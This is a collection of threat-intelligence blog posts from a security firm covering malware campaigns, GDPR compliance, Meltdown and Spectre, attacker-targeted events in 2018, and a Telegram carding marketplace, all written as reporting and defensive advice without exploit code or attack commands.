    The “Dark Caracal” threat group has conducted espionage through mobile and desktop malware variants since 2012, researchers have determined. The group delivered malware via phishing links and physical access to targeted devices, harvesting user information without particularly sophisticated tactics, techniques and procedures (TTPs). Although Dark Caracal has been allegedly linked to the Lebanese state, inconsistent geographic targeting, lack of tailored phishing content and operational security flaws do not suggest an organized, state-led campaign. Mobile devices will highly likely remain vulnerable to espionage and financially driven threats, given the valuable nature of their stored content.

    Dridex Campaign Debuts Distribution Tactic

    A new spam email campaign delivering the “Dridex” banking malware demonstrated a previously unreported tactic: compromising file transfer protocol (FTP) servers to act as the download location for malicious documents. The threat actors were likely trying to avoid detection by email gateways and network policies, which consider FTP servers as trusted locations. Security company Forcepoint attributed the campaign to the “Necurs” botnet, based on its previous association with Dridex, although this was a low-scale campaign in comparison with prior Necurs activity. More targeting of FTP servers to distribute malware is likely.

    Turla Updates Malware After NCSC Public Advisory

    The “Neuron” malware associated with “Turla”, a Russia-linked advanced persistent threat (APT) group, was updated five days after a public advisory on Turla activity by the United Kingdom National Cyber Security Centre (NCSC). Neuron was adapted to avoid identification by the malware detection signatures published by the NCSC. Although the reason for the update is unclear, Turla may have responded to public reporting on its own campaigns. Alternatively, Turla may have experienced diminished success following the advisory, when new defensive measures were taken. As threat actors can quickly change malware obfuscation techniques, organizations should be proactive about network security, using threat intelligence, network log monitoring and detection signatures.

    Misconfigured Jenkins Servers Exposed Companies’ Sensitive Data

    A researcher identified misconfigured servers associated with Jenkins, a software development tool. The accessed servers contained sensitive data pertaining to multiple British companies, including usernames, passwords, private keys and Amazon Work Space access tokens. The researcher identified exposed platforms using internet of things search engine Shodan, and then scraped revealed URLs to find unauthenticated login pages. It is unknown whether threat actors accessed any misconfigured servers; however, the method used to detect the vulnerable servers was likely replicable. Companies should ensure use of unique credentials and multi-factor authentication for internet-facing and cloud-based assets.

    Russian Fuel Customers Shortchanged in Criminal Operation

    A Russian criminal operation was disrupted after the perpetrators used software to over-charge individuals purchasing gas in Southern Russia. Malicious software was applied to electronic gas pumps and reportedly charged customers for more fuel than was delivered, shortchanging victims 3% to 7% per gallon of fuel pumped. The software enabled pumps, cash registers and back-end systems to display false data to victims and relied on complicit insiders at fuel stations. The developer of the software was reportedly arrested. The lucrative nature of the fuel industry means it will continue to be targeted by financially motivated criminal actors.

    Fancy Bears Leaks Documents from International Luge Federation

    The “Fancy Bears” hacking group publicly leaked documents purportedly sourced from the International Luge Federation (FIL), and claimed the violation of “principles of fair play”, particularly regarding drug tests. It is unknown how and when the documents were obtained, although threat group “APT-28” (aka Fancy Bear) allegedly targeted certain members of the International Olympic Winter Sports Federations in late 2017, including the FIL. The precise relationship between Fancy Bears and APT-28 is not publicly known, although APT-28 were previously associated with the compromise of the World Anti-Doping Agency in 2016. More leaks by Fancy Bears are likely in the near future.

    US Media Personalities Targeted in Twitter Phishing Campaign

    Media personalities and conservative individuals in the United States were targeted by a Twitter phishing campaign, potentially conducted by the Turkish Cyber Army. At least three Twitter accounts were confirmed as compromised, including that of journalists Sara Carter (@SaraCarterDC) and Greta Van Susteren (@greta), as well as Sheriff David Clarke (@SheriffClarkeTC). The campaign employed a spoofed Twitter login page, which was likely used to harvest credentials and compromise the three accounts. Although no official claim of responsibility was detected from the Turkish Cyber Army, this campaign would be consistent with previously observed activity. More media outlets will likely be targeted in the immediate future.

    Listen to this week’s Shadow Talk Episode here:

    Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.


    Data Privacy Day: 8 Key Recommendations for GDPR Readiness Fri, 26 Jan 2018 05:18:37 +0000 This Sunday is Data Privacy Day, “an international effort held annually on January 28th to create awareness about the importance of respecting privacy, safeguarding data and enabling trust”[1]. With GDPR regulations coming into effect May 2018, data privacy is even more top of mind for all organizations.

    If you have the responsibility for ensuring that your business meets the obligations under the GDPR, you are most likely either already down the path to compliance, or at least getting serious about plans to become compliant. Data exposure is becoming increasingly important as local, national, and international legal obligations bring about greater responsibilities for organizations to protect customer data in terms of compliance, notification, and monitoring.
    Data Privacy Day Info Image


    Here at Digital Shadows, we focus on providing our clients with comprehensive data loss monitoring and management across the widest range of intelligence sources found in the open, deep, and dark web. Through the combination of data science and machine learning, and more than 50 intelligence analysts, our service enables them to mitigate risk and demonstrate a long-term commitment to European and other regulators on this important issue.

    The GDPR regulations are an evolution of existing European Union (EU) privacy legislation ensuring that companies respect privacy, gain proper consents, and responsibly protect information and data under their control. While we recommend clients seek legal support, a great deal can be achieved by the following 8 activities:

    1. Scope Your Data – Make sure that you understand which data is in scope for your organization. This should include data about your customers and employees (as a Controller), as well as data your process on behalf of other organizations (as a Processor). GDPR encompasses protection of EU citizen data, regardless of where it resides. This also requires organizations identify any new sensitive data types, such as health information or information relating to children.
    2. Understand Data Transfer Agreements – Businesses need to clearly understand in which jurisdictions data is being held and accessed from and ensure that the transfers that take place are properly accounted for. This is especially important if some of that data is held outside of the EU as concurrence will be required.
    3. Update Consent Methods or Legal Basis for Processing – Update the methods via which consent is sought from individuals, or how the legal basis for lawful processing of that data is established. This should include assurances that the spirit of the data protection principles has been respected.
    4. Prepare for Subject Access Requests – Individuals can already request to see a copy of the information an organization holds about them. Under GDPR, businesses cannot charge EU consumers for access of data that may be held and must respond within one month of receiving the request. Consumers have additional rights such as ‘the right to be forgotten,’ and the right to modify and export records that must be properly addressed.
    5. Prepare for 72-Hour Notification – New rules exist for how quickly authorities must be notified in the event of a data breach. This new legislation requires data controllers to notify the national data protection regulator within 72 hours of a “breach.” This applies when the “data breach is likely to result in a high risk to the(ir) rights and freedoms.”
    6. Update Your Contracts with New Obligations – The legal contracts and policies must reflect suppliers’ obligations to their clients and the updated consent and requirements set out above.
    7. Update Your Privacy Policies and Statements – Ensure that the privacy policies and statements to consumers appropriately reflect obligations. The policies must be concise, transparent, intelligible, and free of charge. This includes the tailoring of language to different age groups; privacy information for children must be written appropriately.
    8. Designate a Data Protection Officer – Most organizations are legally required to nominate a Data Protection Officer (DPO) ). This applies to organizations that store a large amount of information about employees or other individuals. In particular, the rule applies to public authorities or those organizations that carry out large-scale monitoring of individuals.

    To learn more about becoming GDPR compliant, check out our recent paper, The Path to GDPR Compliance, where we provide recommendations  and the key resources that organizations can utilize to instill customer trust and brand protection.

    If you want to get involved in this year’s Data Privacy Day efforts, visit StaySafeOnline’s website for more information.

    Subscribe here to get the latest threat intelligence and more from Digital Shadows in your inbox. 



    Don’t Rely on One Star to Manage Digital Risk, The Key is Total Coverage Tue, 16 Jan 2018 16:12:58 +0000 This post originally appeared on

    Vince Lombardi, one of the greatest coaches of all time said, “The achievements of an organization are the results of the combined effort of each individual.” Think about the most successful coaches and you’ll see a common thread – the ability to bring players and staff together and use their talents effectively and intelligently to defeat opponents. Phil Jackson accomplished this with different NBA franchises and Joe Gibbs with different quarterbacks. They didn’t count on any one “star” to carry the team. Nor did they focus their efforts defending against one big threat. They led their teams to victory by looking at the big picture and understanding how to strategically apply capabilities to defeat whatever the opposition pulled out of their bag of tricks.

    Wouldn’t it make sense to follow a similar approach to defeat adversaries and mitigate digital risk, the risk associated with expanding our digital footprint as we increase business activities on the internet and via cloud solutions? But, typically, we don’t.

    Just as great coaches know they’re up against an entire team that can vary their plays and draw on different skills with the sole aim of defeating them, the risks as you digitally transform your business come from all kinds of adversaries and places beyond the boundary. Individually, you don’t just have a dark web problem, or an open source problem or a social media problem. You have a problem with ALL external digital risks and threat actors seeking to do your business harm. 

    Digital risks include cyber threats, data exposure, brand exposure, third-party risk, VIP exposure, physical threats and infrastructure exposure. Often these threats and risks span data sources and cannot be detected in full context by any point solution or even by multiple solutions used in isolation. You need insight across the widest range of data sources possible to mitigate digital risk and better protect your organization. Here are three examples.  

    1. We all know organizations struggle to keep up with patching, and this challenge isn’t expected to go away any time soon. Gartner predicts that through 2020, 99% of vulnerabilities exploited will continue to be the ones known by security and IT professionals for at least one year. Addressing every vulnerability as soon as a patch is issued isn’t possible for most IT teams. But determining which vulnerabilities to patch first can be problematic. By monitoring open, deep and dark web forums as well as social media you can learn which vulnerabilities are being discussed as popular vectors for attack. These sources can also reveal which exploit kits are using specific vulnerabilities and even if those exploit kits are being used to target your industry. Armed with this information, you can make more informed decisions about which systems and applications to patch first and more effectively and efficiently mitigate risk. 
    2. Ideologically motivated, hacktivists are far from quiet. They typically use social media to promote their cause and garner attention and often announce their targets on Facebook or Twitter. They also use Internet Relay Chat (IRC) to orchestrate attacks in real-time. Monitoring social media and open source IRC channels for an uptick in hashtags and traffic is a leading indicator of whether a cause is gaining traction. Mentions of your company, key executives or IP addresses will help you determine if you’re being targeted so you can proactively boost security controls.
    3. A more complex example, but one that has been in the spotlight recently, is database extortion. In this scenario, attackers look for publicly exposed databases, for example on Amazon S3 buckets. From there, they may be able to find information allowing them to remotely connect to a server or desktop to infiltrate your organization further. Or, as in the case of the MongoDB extortion pandemic, they can replace data with a ransom request for bitcoin payment in exchange for restoration of the database. Should the ransom request go unheeded, attackers may then apply pressure on the CEO by posting a message to Pastebin or via social media. In this scenario there are several points of compromise and several ways to gain a deeper understanding of the attack. To learn the entire sequence of events, the impact to your organization and how to mitigate digital risk in the future you need more than visibility into S3 buckets. You need access to hacked remote server and remote desktop protocol (RDP) sites to look for mentions of your IP addresses. Access to Pastebin and monitoring social media channels will allow you to check for mentions of your company and/or executives. The dark web can provide information on threat actor profiles to understand their motivation and gauge credibility.

    In each of these three examples, tracking just one source, or even all sources but in isolation would not give you the full context for any one of these threats. Like a coach, you need to be able to see the big picture with an approach that monitors the entire Internet for risks to your business. Only then can you take the right actions to keep your business and reputation intact and mitigate digital risk in the future.  

    Want to learn how we can help manage your organization’s digital risk? Watch our full demo video here.

    Subscribe here to get the latest threat intelligence and more from Digital Shadows in your inbox. 

    Another Year Wiser: Key Dates to Look Out For In 2018 Wed, 10 Jan 2018 17:37:57 +0000 Early last year, we published a blog outlining the events of 2017 that were most likely to attract the attention of malicious actors who would present potential risks to your organizations. Unsurprisingly, many of the usual suspects were active at significant points in the year, such as tax deadline day, the German elections, and Black Friday.

    We are doing this again this year and want to make sure that you have these key events on your radar. When assessing the key events of 2018, we need to look at the activities of cybercriminals, hacktivists and nation-state affiliated actors.

    Date Event Actor Affected Geographies Targets
    6 February G20 summit Nation State; Hacktivism Argentina Government
    9 February Winter Olympics Nation State; Hacktivism; Cybercrime South Korea Event Sponsors, Consumers, Retailers; Hospitality
    13 February Tibetan Independence Day Nation State; Hacktivism Tibet; China; India Government
    4 March Italian Elections Nation State Italy Government
    18 March Russian Presidential Election 


    Nation State Russia Government
    17 April Tax Deadline Day Cybercriminal United States Consumers
    14 June FIFA World Cup Cybercriminal; Nation State; Hacktivism; Russia Event Sponsors, Consumers, Retailers; Hospitality
    14 August Pakistan Independence Day Nation State India; Pakistan Unknown
    9 September Swedish Elections Nation State Sweden Government
    18 September Anniversary of the Mukden Incident Hacktivism Japan Unknown
    November Irish Presidential Election Nation State Ireland Retail, Consumers
    5 November OpVendetta Hacktivism All Finance
    23 November Black Friday Cybercriminal United States Retail, Consumers
    26 November Cyber Monday Cybercriminal United States Retail, Consumers
    25 December Christmas Day Hacktivism All Online Gaming


    With an ever-increasing amount of money spent online, there are more opportunities for card not present fraud (fraud that can occur with transactions that are conducted online or over the phone). Just as we discovered in our “Retail Risks” whitepaper, these are risks that exist throughout the year. During Black Friday and Cyber Monday, criminal efforts tend to increase to take advantage of the increased number of transactions being made. Similarly, as we approach 17th April (that’s two days later than normal), we’re likely to see new techniques around tax return fraud emerge as criminals look to bypass IRS antifraud measures.

    There are other events that are likely to provide rich-pickings for cybercriminals. Two years ago, wrote about the risks to the Rio Olympics for retailers, sponsors, and consumers. Similarly, the Winter Olympics and the FIFA World Cup are expected to attract cybercriminals seeking to exploit card-wielding tourists.



    Despite the predictability of some reoccurring online protests, the significance of hacktivist campaigns is often difficult to anticipate. One example of such reoccurring campaigns is OpVendetta, which occurs each year on November 5. We monitor the levels of participation and organization to assess the likely impact of the campaign, as seen recently with the OpCatalunya operation that targets companies operating in Spain.

    Of course, hacktivist campaigns are not always as they appear; Anonymous Poland, for example, have previously demonstrated characteristics of a nation-state proxy. We will have to wait and see whether more hacktivist groups demonstrate techniques beyond the typical denial of service attacks and website defacements.


    Nation-State/Nation-State Affiliated

    Since the 2016 U.S. Presidential Election, election season has become a common time of the year for nation states and their affiliated groups to develop online campaigns. There are a range of tools and techniques widely available to actors who seek to influence elections. We’ll be keeping an eye on a host of elections coming up in 2018, but the key ones will be the Russian, Swedish, and Italian elections.


    While this is by no means a definitive list of 2018 hot spots, outlining these events at the beginning of the year provides us with areas of focus. With this focus, we can monitor for the key drivers and assess the likely impact of a particular campaign or event. To stay up to date with the latest key events, threat intelligence, and research, subscribe to our email list here.

    Why All Companies, CEO, CFO, CLO, and Board of Directors Should Require Digital Risk Management to Mitigate Corporate Risk Wed, 10 Jan 2018 16:16:27 +0000 Cyber attacks on businesses are now weekly news as breaches of data are announced regularly. However, until recently many corporate executives did not understand or share the view of its importance of addressing Digital Risk at the Board level. The Board’s role in understanding and monitoring digital and cyber risk has been highlighted by a multitude of lawsuits alleging Boards were asleep at the switch in the face of a known danger.

    Executives and Boards at all companies, especially public companies, face mounting pressure to consider what a worst-case cyber event would look like and how that event would be handled. What corporate governance structures would kick in? What will the legal fallout be —whether it is privacy litigation, shareholder suits or criminal investigations? To fully grasp the magnitude of such risk, Boards must address specific questions and implement effective policies that protect their customers, their organizations and themselves. In some states and countries, Board members may be personally liable for cybersecurity gaps and experts foresee that personal liability will only accelerate.

    Board of Director members are responsible for ensuring the corporation is managed in the shareholders’ best interest including:

    1. Fiduciary duties of Directors and Officers regarding Digital Risk and Cybersecurity. Most officers and directors understand you are acting on an informed basis, in good faith, and in the company’s best interests. Proper preparedness and risk management are critical to insulating officers and directors from liability. Boards must hold frequent meetings to analyze cyber risks and implement potential plans of actions. If appropriate, create a committee to review cyber issues and investigate data incidents and breaches. Boards must implement a risk management program, a monitoring plan, test the program to ensure compliance, and investigate possible violations.
    2. Officers and Directors should discharge their Digital Risk fiduciary duties. Digital Risk management programs must have the right technologies in place to identify where risks can have the most impact on the business and brand. Companies should have policies in place that detail the expected response to incidents and ensure that system controls are in place. A prepared team is needed, equipped with the tools and ability to take immediate action when problems arise and have the authority to monitor and test, both internally and externally, potential threats. Cyber incidents impact multiple levels of an organization and departments including legal, IT, risk/insurance, human resources, marketing, and public relations. These departments should be tasked with providing input in addition to that of board members and management. The companies best prepared to prevent and respond to cyber attacks recognize that this multifaceted preparedness is an ongoing cycle, and not simply a one-time list of tasks to complete.

    To demonstrate that a Board has properly discharged its duties, it must work with management to ensure proper teams have organized plans to prevent and respond to any breaches. Therefore, a company must constantly assess cyber risk trends and threats. Just because nothing appears to be happening on a daily, weekly, monthly or annual basis, does not mean an incident may not occur.

    The business judgment rule is a legal principle protecting officers, directors, managers and other agents of a corporation from liability for loss incurred as a result of business decisions that are within their authority and power to make when sufficient evidence demonstrates that the transactions were made in good faith. To ensure protection under the business judgment rule, it is wise to have regular presentations for pertinent committees to provide updates on trends and threats, and to ensure that your security IT practices are up to date.

    1. Investing in a Digital Risk framework. Companies struggle to determine how much to spend on IT security, an investment many liken to insurance — no one wants to pay more than they have to. If you are a public company, spend the money to protect the business. You no longer can afford to penny pinch. The liabilities, penalties and litigation impact are significant. Companies spend an average of 6-7% of their IT budget on security technology, outside services and staff. How much an organization invests in IT security stems from a range of criteria. Companies that are consumer facing, have a large attack surface, a recognized brand, highly guarded intellectual property, and compliance requirements to industry regulations and government legislation tend to outspend their peers. The reality is organizations of all types have experienced security breaches. There remains a misplaced belief in “security by obscurity” among organizations with lesser known brands, smaller attack surface, and less stringent industry regulations. The situation in the last 2-3 years has changed substantially. With so many global state actors and well-funded cybercrime organizations, IT security costs are increasing rapidly.

    The right answer does not start with a dollar figure, but companies should work through a Digital Risk management process. As a publicly listed company, you can no longer take an ad hoc approach, basing your budgeting decisions on trial and error, or reacting to problems as they arise instead of proactively approaching a security framework. This process is monitored and repeated (both internal networks and the external environment where your assets may have leaked through malicious actions or unintentionally lying in the open) and shortcomings addressed over time. This simple yet time-consuming process is undertaken by not only large public companies but also midmarket and small businesses who face the same cyber risks but typically with fewer IT security resources. With cybercrime advancing at unprecedented levels, companies must proactively implement a security risk management framework, develop technology internally, hire or outsource security professionals commensurate with your risk, train all employees on security awareness, and have a real-time incident response playbook that balances digital threat intelligence and risk mitigation.


    Want to learn more around GDPR and your team’s role in compliance and digital risk management? Download our latest report, “The Path to GDPR Compliance”.

    Subscribe here to get the latest threat intelligence and more from Digital Shadows in your inbox. 

    Digital Shadows Launches Weekly Newsletter: “In the Shadows” Mon, 08 Jan 2018 10:30:07 +0000 Digital Shadows has just launched a new research-led weekly newsletter, “In the Shadows”, and podcast, “Shadow Talk”. Both highlight key findings of primary-source research our Intelligence Team is conducting, along with the latest threat actors, campaigns, security events and industry news. From technical exploit analysis to strategic insights, the content of the newsletter and podcast allows a timely and concise “analyst’s eye view” of key information security issues.

    In upcoming weeks, expect to be updated on our ongoing research into the cybercriminal underground, as well as the effect that increasing exposure and scrutiny from law enforcement has had on this community over the past few years. The latest findings can be found each week in the newsletter, here:

    The cybercriminal community has been significantly disrupted by the high-profile take-down of dark web criminal marketplaces, such as the Silk Road, HANSA and AlphaBay. Rather than overtly deterring cybercriminal activity, the prominent media coverage has, in fact, increased the number of users logging onto cybercriminal forums. What has changed significantly from the “back in the day” forums to the new generation is the trust models users are creating to ensure security.

    The Intelligence Team looks forward to sharing this research via “In the Shadows.” Stay up to date with the latest security news and trends by signing up to receive “In the Shadows”, in your inbox, every Monday:

    You can also listen to the latest research subjects discussed on “Shadow Talk”, which will feature the Digital Shadows Research and Intelligence Teams covering a hot topic in security each week.

    Hear our very first Shadow Talk podcast episode here:

    Don’t miss an episode—sign up now for updates:

    GDPR: Why You Need to Consider the Personal Data That Lies Outside of Your Organization Thu, 04 Jan 2018 21:48:41 +0000 In 2010, reports emerged that the Information Commissioners’ Office (ICO) could now fine organizations up to £500,000 ($677,000) under the Data Protection Act. Eight years later and that cap has proven woefully insufficient in acting as a deterrent to organizations’ lax attitude towards data protection. In May 2018, organizations could be fined up to four percent of their revenue or €20 million ($24 million) – whichever is greater.

    While the potential fines under GDPR have attracted the headlines, our new report, GDPR: A Path to Compliance, distills some of the key changes coming and provides a framework with practical advice of how to minimize compliance challenges when the legislation (and fines) comes into force in May 2018. GDPR isn’t new, it’s been in the works since at least January 2012 when the European Commission proposed an update to data protection regulation. As the number of breaches continues to increase (albeit not necessarily publicly reported), this issue has only become more important.

    The “D” in GDPR is focused on data, and so Information Technology plays a critical role. While there must be an effort to understand what sensitive data sits within the organization, organizations must also look beyond the perimeter to understand how and where EU citizen personal data is exposed.


    First of all, organizations need to consider what is meant by “personal data” – this definition has broadened significantly under the EU Data Protection Directive:

    “‘Personal data’ shall mean any information relating to an identified or identifiable natural person (‘Data Subject’); an identifiable person is one who can be identified, directly or indirectly, in particular by reference to an identification number or to one or more factors specific to his physical, physiological, mental, economic, cultural or social identity.”

    In reality, this means that personal data extends to far more than before – even IP addresses and browser cookies are considered to be personal data. Organizations need to be aware of what personal data they hold, either as a Controller (data about your own customers and employees) or Processor (data that you process on behalf of other organizations).

    Given this broad definition, how can organizations go about becoming GDPR compliant? Our paper sets out four key stages GDPR compliance: discover, define, deliver, and detect. Within each of these stages, we provide advice and the key resources that organizations can turn to.

    GDPR compliance cannot be achieved easily with a shiny new widget or product. Instead, a well-thought-out program that addresses data loss management will help organizations demonstrate a high level of compliance to a regulator and minimize the commercial and reputational risks associated with a regulatory failure.

    With the scope of personal data expanded, organizations cannot simply protect their data at the boundary. Download our report to find out how to manage your data exposure in line with GDPR.

    Meltdown and Spectre: The Story So Far Thu, 04 Jan 2018 18:27:12 +0000 On Wednesday, rumors surfaced that there were vulnerabilities in the majority of microprocessors, which would allow attackers to access system memory information held in the kernel, the most privileged area of modern operating systems. The kernel manages processes including starting and ending user programs, security settings, memory handling, and controlling hardware such as memory and network drives.

    Later in the day the security community rallied together to produce a barrage of research on two different attacks that took advantage of these flaws: enter Meltdown and Spectre.

    With so much overlapping commentary, and further details likely to be released, it’s hard to make sense of exactly what’s going on and what systems are at risk. Here’s what we know – and do not yet know – so far. The Digital Shadows Intelligence team conducted this analysis by:

    1. Reproducing and validating the Spectre Proof of Concept Code (POC) found in the Spectre academic whitepaper,
    2. Researching criminal forums for related activity,
    3. Collating publicly available research from the security community.

    What we know about Meltdown and Spectre

    • Meltdown and Spectre were discovered by at least three different groups, including researchers at Google Project Zero, Cyberus Technology and Graz University of Technology. The flaws were responsibly disclosed back in June 2017, but details of the vulnerabilities only appeared yesterday on January 3rd. It seems the affected companies wanted to keep the news under wraps until fixes were ready to be released, but the vulnerabilities were disclosed earlier than planned.
    • Meltdown is an attack that bypasses the mechanism between the operating system and applications. This can lead to the exposure of passwords and other sensitive data stored in the system memory. The vulnerability can be tracked via CVE-2017-5754.
    • Spectre is an attack that bypasses the isolation between applications by exploiting what is known as a “speculative execution”, used by modern processors to increase performance speed. Under the right conditions, the processor can be tricked into leaking data returned from other applications, exposing sensitive data. The exploit is tracked via CVE-2017-5753 and CVE-2017-5715.Digital Shadows analysts tested a proof-of-concept code referenced in the Spectre whitepaper, which functioned correctly.


    Spectre proof of concept exploit tested on an Ubuntu 16.04 VM by Digital Shadows

    • These flaws are not exclusive to Intel processors, they also affect AMD and ARM. Cloud environments are also at risk as an attacker could break out of one user’s process and access processes running on the same shared server.
    • Patches for Meltdown have been released; however, there is currently no specific patch available for Spectre, which will likely require a hardware fix to mitigate completely. The US CERT certainly seems to think so.

    What we don’t know about Meltdown and Spectre

    • Although the general consensus is that nearly every processor commonly in use today is at risk, the full extent of which systems and platforms are affected is still unknown.
    • How easy is it to exploit these flaws? There have not been any reports of Meltdown or Spectre attacks being performed in the wild for malicious purposes. While Digital Shadows’ analysis of the Spectre POC code functioned correctly, the intricacies and feasibility of performing a Spectre attack against another machine under the right conditions with the “speculative exploitation” approach is still unclear.
    • How can threat actors leverage Meltdown and Spectre for their attacks? The exploit scenarios are some of the biggest unknowns. The nature of the vulnerabilities themselves lead to the exposure of sensitive data such as encryption keys and passwords, so future attacks would likely involve users stealing this information to then takeover machines and accounts. Internet of Things (IoT) devices are also susceptible as they run the same type of processors, and people are less likely to update these accordingly the same way they would their personal or work computers. A dedicated attacker could decide to use these vulnerabilities to find flaws and default passwords in IoT devices, which we saw led to the creation of the Mirai botnet.
    • Criminals do not need to use Meltdown and Spectre for their attacks if they can profit in other ways. We have seen actors discussing the sale of the exploits on the Shadow Broker’s “Scylla Hacking Store” for $8900. This is likely to be the first of many claimed sales across the dark web and criminal forums, as cybercriminals look to profit from the media attention and hysteria around these discoveries.

    Meltdown and Spectre exploit advertised for sale by the Shadow Brokers 


    What you can do about it

    A host of companies have come out and released advisories for their affected products. We have provided a list of these and their relevant websites below:

    1. Intel
    2. Microsoft
    3. Google
    4. Amazon
    5. ARM
    6. Android
    7. Mozilla
    8. Linux
    9. Red Hat
    10. Apple

    Patching and rebooting should therefore be a priority requirement for all organizations and home users. Despite this, there are a few things to bear in mind:

    • Spectre cannot yet be completely mitigated against through patching,
    • These mitigations will affect system performance and slow down machines. You will want to test out the mitigations prior to deploying them.
    • Mitigating and patching hardware with software is very difficult, and it creates problems with other applications (e.g.: endpoint protection)

    These patches are only preliminary measures though, and there will probably be future updates released to combat the performance problems caused by these fixes.

    What we can be certain of is that this issue will run on for a considerable length of time. Digital Shadows will continue to post updates on both Meltdown and Spectre as and when new information becomes available. Happy New Year!

    What Attackers Want for Christmas Fri, 22 Dec 2017 16:41:56 +0000 Our guest author Krampus has a special blog post for the Team with the festive Red colours:

    Christmas lists are always a problem, here are some examples to get attackers thinking during the holiday season:

    • Leaked (NSA) exploits: ETERNALBLUE, ETERNALROMANCE and friends have been a rare delight this year, bringing a smile to the lips of ol’Krampus. The destruction wreaked by WannaCry, NotPetya and BadRabbit has spoken to the power of these leaked exploits. There’s nothing that Krampus likes better than gaining SYSTEM privileges directly over the network!
    • Vulnerable Supply Chain: Big or small, secondary or tertiary, supply chains have been this year’s go-to attack vector. Krampus likes to go for the weakest link in the supply chain and pivot up from there into the target, exploiting highly-connected vendors, subsidiaries and suppliers to reach the goal.
    • Poorly trained workforce: The human element is what gets naughty children on Krampus’ list and Krampus loves the organizations that help to get them there! Not training the workforce to pick on social engineering attacks and terrifying them of the consequences of making a mistake is a fantastic way to help attackers get what they want for Christmas.
    • Credential hygiene: While exploits are effective, other methods of gaining access shouldn’t be ignored. Poor credential hygiene has been exploited by worms like NotPetya with tremendous effect. By taking advantage of password reuse, especially for accounts with Administrator privileges, attackers have been able to compromise environments at scale in a matter of minutes. An all-time Krampus favourite!
    • Data breaches: Nothing warms Krampus’ blackened heart than the theft of hundreds of millions of sensitive records. Data breaches provide such wonderful opportunities for theft, fraud, account takeover, credential reuse and extortion! They happen with a pleasing regularity and Krampus can only say: “bring ‘em on!”.
    • False positives: An organization may have a SOC, but luckily for ol’Krampus, they are typically flooded with false positives, which allows Krampus and friends to rampage unimpeded through their preferred targets. Misconfigured logging systems create a noisy environment where the defenders can’t see the danger until Krampus is long gone! A trusted and loyal friend over the years!
    • Target-rich environments: Once inside a particular environment, it’s always preferable for there to be a lack of segmentation so that exploits and credential reuse can be used to find vulnerable systems. In particular, sensitive data should be available in as many different places as possible and accessible by as many users as possible. This way Krampus doesn’t have to be that specific in his targeting; the naughty list can be as long as you like!

    In order to keep Krampus and his hoards out of your network, we recommend robust security engineering principles to defend your networks:

    1. Default deny: that is, “only provide access where it has been explicitly granted, otherwise deny”.
    2. Least Privilege: that is, “Every program and every privileged user of the system should operate using the least amount of privilege necessary to complete the job”.
    3. (Attack) Surface Reduction: that is, reduce the amount of services running, the number of privileged users and the number of entry points into the system.
    4. Need to Know/Compartmentalization: that is, only grant access where there is an explicit business requirement to do so.
    5. Defence in Depth: that is, not one single control is sufficient to adequately protect a system. Careful usage of the other four principles in physical, technical and administrative controls will go a long way to keeping Krampus out!

    You can find out more about these principles in a previous post we have written on the importance of security engineering.

    OL1MP: A Telegram Bot Making Carding Made Easy This Holiday Season Thu, 21 Dec 2017 16:12:04 +0000 Back in July, we published our research on the carding ecosystem, specifically on an online course that teaches carders how to successfully commit fraud. “Carding” refers to the process of using stolen credit cards to purchase goods or services, which can then be sold on at a reduced price in order to clean the money. Since the demise of AlphaBay and Hansa marketplaces, fraudsters have looked for new platforms to sell these carded goods and services.


    Figure 1: The OLYMP/OL1MP Telegram Marketplace

    Digital Shadows’ intelligence analysts have identified a Telegram Market gaining traction called “OL1MP”. OL1MP has been active since August 2017 looks to provide a new format for buying and selling these goods and services. This is all made easy by the creation of a bot to automate the browsing of these shops. There is a range of items for sale on OL1MP, including discounted hotels, drugs, taxis, documents and driving licenses. OL1MP has a wide range of items for sale including: discounted hotels, drugs, taxis, driver’s licenses and documents. For example, the latter offering includes counterfeit press passes for events.

    On the back of the recent surge in Bitcoin, the market also offers exchange. But it’s not the first Telegram channel to get involved in the trade of cryptocurrencies. Last month, we released research on the “Pump and Dump” schemes that seek to manipulate the price of currencies like UBQ, VCash, Chill Coin, Magi Coin, and Indorse.

    Telegram has been increasing in popularity among cybercriminals, who favor the privacy offered by its encryption. The platform is also very user friendly, and the OL1MP market is no exception. The following figures demonstrate the flow a buyer takes in choosing a service on the OL1MP market, in this case for discounted travel.

    Figure 2: Starting the OL1MP bot, with options “About the project, Escrow, Dope Shops, Services, Holidays, Taxi”


    Figure 3: With “Holidays” selected, the user is able to choose from three verified providers of travel


    Figure 4: Selecting one option, Rick Travel, takes the user to the specific group for that seller. In this case, users can book hotels for 30% of their value and flights for 50%.


    OL1MP ties in this automated effort with a human touch. As with most marketplaces, reviews are important for attracting new customers. In fact, extra discounts are available for those individuals who post pictures and positives comments from their carded holidays.

    In some instances, hotel booking agencies (among other victims) may detect this suspicious activity and cancel the reservation. So, while the functionality of this automated bot is an interesting innovation, there is still a need for human support. In addition to the creator of the OL1MP bot, the telegram group has who offer support on a separate channel.

    Figure 5: The profile of OL1MP’s creator


    Carding is not new, but fraudsters continually look for new ways to sell and buy carder items. The shift to Telegram is part of a broader trend, as criminals looks to find secure but effective ways to promote their goods and services. You can learn about what payment card companies, merchants and consumers can do to protect themselves from carding.

    ‘Tis The Season To Do Predictions – The 2018 Cybersecurity Landscape Mon, 18 Dec 2017 18:09:23 +0000 This post originally appeared on Huffington Post.

    Every year around this time all the security businesses and analysts leap for their crystal ball and attempt to predict what we should be worrying about in the coming 12 months or more. And the sad reality is that not a lot will change as there is not much need for the cybercriminal community to do anything different – it’s already working well now!

    The cybercriminal community is all about profit and that means they continue to utilise the same sorts of tactics if they continue to gain the results they are after – mainly money!

    That said though, how will the threat landscape look like over the next 12 months?

    • Supply chain and third party attacks have been a common feature in 2017 and will continue to be a fruitful attack method for cybercriminals in the next year. These tend to be highly focused operations with predetermined targets of interest, rather than cases of mass, indiscriminate targeting. Nevertheless, the Oracle MICROS breach that affected its point of sale customers and NotPetya campaign were outliers in this regard. This is probably due to the differing motives of these campaigns: supply chain attacks are often done for intelligence gathering and reconnaissance purposes, whereas thee MICROS and NotPetya attacks were financial or disruptive, so the emphasis would have been on widening the number of targets for maximum effect. Suppliers and third parties are often seen as easier entry points for attackers, especially as many do not have adequate security maturity levels. Moreover, suppliers are often given unnecessary wholesale access to company networks, which is why they are targeted in the first place.
